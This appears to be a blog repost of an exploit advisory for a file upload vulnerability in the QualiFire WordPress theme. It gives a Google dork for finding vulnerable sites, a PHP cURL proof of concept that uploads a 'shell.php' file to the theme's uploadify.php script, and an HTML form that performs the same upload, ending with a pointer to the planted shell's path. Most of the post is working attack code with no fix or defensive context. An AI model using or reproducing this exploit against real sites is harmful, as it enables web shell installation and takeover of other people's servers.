Showing posts with label themes. Show all posts
Showing posts with label themes. Show all posts
Friday, January 20, 2017
Wordpress Themes QualiFire File Upload Vulnerability
Wordpress Themes QualiFire File Upload Vulnerability
#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================
-- Proof Of Concept --
Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
When Vuln : Blank
Remote file :
<?php
$uploadfile="shell.php";
$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(Filedata=>"@$uploadfile",
folder=>/wp-content/themes/qualifire/scripts/admin/uploadify/));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
Shell Path : Here
Available link for download
Subscribe to:
Posts (Atom)